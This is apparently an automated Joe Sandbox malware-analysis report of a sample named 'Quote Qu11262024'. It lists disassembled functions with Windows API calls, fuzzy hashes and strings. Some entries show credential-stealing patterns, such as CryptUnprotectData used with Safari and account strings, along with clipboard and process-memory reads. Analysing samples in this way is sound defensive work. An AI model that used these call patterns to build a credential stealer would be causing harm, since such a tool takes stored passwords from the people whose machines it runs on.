                                                                                                    • API String ID: 1936579350-0
                                                                                                    • Opcode ID: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                                                                                                    • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                                    • Opcode Fuzzy Hash: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                                                                                                    • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free
                                                                                                    • String ID:
                                                                                                    • API String ID: 1294909896-0
                                                                                                    • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                    • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                                    • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                    • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free
                                                                                                    • String ID:
                                                                                                    • API String ID: 1294909896-0
                                                                                                    • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                    • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                                    • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                    • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free
                                                                                                    • String ID:
                                                                                                    • API String ID: 1294909896-0
                                                                                                    • Opcode ID: 908a2f96169ffd3f5635234353574390e30f5bbba8146f1a6a93cc8e14f9cc97
                                                                                                    • Instruction ID: 5e082493cfe38c59748d9de5a46a99a47989c0e105afa31b953e1adb18ef7a34
                                                                                                    • Opcode Fuzzy Hash: 908a2f96169ffd3f5635234353574390e30f5bbba8146f1a6a93cc8e14f9cc97
                                                                                                    • Instruction Fuzzy Hash: 17900282455501105C0425755C06505110808A313A376074A7032955D1CE188060601D
                                                                                                    APIs
                                                                                                    • EmptyClipboard.USER32 ref: 004098EC
                                                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                    • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                                    • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                    • GetLastError.KERNEL32 ref: 0040995D
                                                                                                    • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                    • GetLastError.KERNEL32 ref: 00409974
                                                                                                    • CloseClipboard.USER32 ref: 0040997D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                    • String ID:
                                                                                                    • API String ID: 3604893535-0
                                                                                                    • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                    • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                                                    • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                    • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                                                    APIs
                                                                                                    • EmptyClipboard.USER32 ref: 00409882
                                                                                                    • wcslen.MSVCRT ref: 0040988F
                                                                                                    • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                                                    • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                                    • CloseClipboard.USER32 ref: 004098D7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 1213725291-0
                                                                                                    • Opcode ID: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
                                                                                                    • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                                                    • Opcode Fuzzy Hash: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
                                                                                                    • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32 ref: 004182D7
                                                                                                      • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                    • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                                    • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                                    • LocalFree.KERNEL32(?), ref: 00418342
                                                                                                    • free.MSVCRT ref: 00418370
                                                                                                      • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7622DF80,?,0041755F,?), ref: 00417452
                                                                                                      • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                                    • String ID: OsError 0x%x (%u)
                                                                                                    • API String ID: 2360000266-2664311388
                                                                                                    • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                    • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                                    • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                    • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??2@??3@memcpymemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 1865533344-0
                                                                                                    • Opcode ID: 0071396e032f76671cb9f6bfe1f2b1364741fc1e38965bf138fca73b5b698f56
                                                                                                    • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                                                                                    • Opcode Fuzzy Hash: 0071396e032f76671cb9f6bfe1f2b1364741fc1e38965bf138fca73b5b698f56
                                                                                                    • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                                                                                    APIs
                                                                                                    • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: NtdllProc_Window
                                                                                                    • String ID:
                                                                                                    • API String ID: 4255912815-0
                                                                                                    • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                                    • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                                                                                    • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                                    • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                                                                                    APIs
                                                                                                    • _wcsicmp.MSVCRT ref: 004022A6
                                                                                                    • _wcsicmp.MSVCRT ref: 004022D7
                                                                                                    • _wcsicmp.MSVCRT ref: 00402305
                                                                                                    • _wcsicmp.MSVCRT ref: 00402333
                                                                                                      • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                      • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                    • memset.MSVCRT ref: 0040265F
                                                                                                    • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                                                      • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                      • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                      • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                    • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                                                    • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcsicmp$Freememcpy$Library$AddressCryptDataLocalProcUnprotectmemsetwcslen
                                                                                                    • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                    • API String ID: 2929817778-1134094380
                                                                                                    • Opcode ID: 6b2dcad71dd29105a6653737fa8e45fa2e3e7ed8fa5e3c17c72860e5870ea394
                                                                                                    • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                                    • Opcode Fuzzy Hash: 6b2dcad71dd29105a6653737fa8e45fa2e3e7ed8fa5e3c17c72860e5870ea394
                                                                                                    • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                                    • String ID: :stringdata$ftp://$http://$https://
                                                                                                    • API String ID: 2787044678-1921111777
                                                                                                    • Opcode ID: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
                                                                                                    • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                                                    • Opcode Fuzzy Hash: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
                                                                                                    • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                                    • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                                    • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                                    • GetDC.USER32 ref: 004140E3
                                                                                                    • wcslen.MSVCRT ref: 00414123
                                                                                                    • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                                    • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                                    • _snwprintf.MSVCRT ref: 00414244
                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                                    • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                                    • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                                    • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                    • String ID: %s:$EDIT$STATIC
                                                                                                    • API String ID: 2080319088-3046471546
                                                                                                    • Opcode ID: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                                                                                                    • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                                    • Opcode Fuzzy Hash: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                                                                                                    • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                                    APIs
                                                                                                    • EndDialog.USER32(?,?), ref: 00413221
                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                                    • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                                    • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                                    • memset.MSVCRT ref: 00413292
                                                                                                    • memset.MSVCRT ref: 004132B4
                                                                                                    • memset.MSVCRT ref: 004132CD
                                                                                                    • memset.MSVCRT ref: 004132E1
                                                                                                    • memset.MSVCRT ref: 004132FB
                                                                                                    • memset.MSVCRT ref: 00413310
                                                                                                    • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                                    • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                                    • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                                    • memset.MSVCRT ref: 004133C0
                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                                    • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                                                    • wcscpy.MSVCRT ref: 0041341F
                                                                                                    • _snwprintf.MSVCRT ref: 0041348E
                                                                                                    • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                                    • SetFocus.USER32(00000000), ref: 004134B7
                                                                                                    Strings
                                                                                                    • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                                    • {Unknown}, xrefs: 004132A6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                    • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                    • API String ID: 4111938811-1819279800
                                                                                                    • Opcode ID: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                                                                                                    • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                                    • Opcode Fuzzy Hash: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                                                                                                    • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                                    • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                                    • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                                    • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                                    • EndDialog.USER32(?,?), ref: 0040135E
                                                                                                    • DeleteObject.GDI32(?), ref: 0040136A
                                                                                                    • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                                    • ShowWindow.USER32(00000000), ref: 00401398
                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                                    • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                                    • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                                    • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                                    • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                    • String ID:
                                                                                                    • API String ID: 829165378-0
                                                                                                    • Opcode ID: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                                                                                    • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                                    • Opcode Fuzzy Hash: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                                                                                    • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00404172
                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                    • wcscpy.MSVCRT ref: 004041D6
                                                                                                    • wcscpy.MSVCRT ref: 004041E7
                                                                                                    • memset.MSVCRT ref: 00404200
                                                                                                    • memset.MSVCRT ref: 00404215
                                                                                                    • _snwprintf.MSVCRT ref: 0040422F
                                                                                                    • wcscpy.MSVCRT ref: 00404242
                                                                                                    • memset.MSVCRT ref: 0040426E
                                                                                                    • memset.MSVCRT ref: 004042CD
                                                                                                    • memset.MSVCRT ref: 004042E2
                                                                                                    • _snwprintf.MSVCRT ref: 004042FE
                                                                                                    • wcscpy.MSVCRT ref: 00404311
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
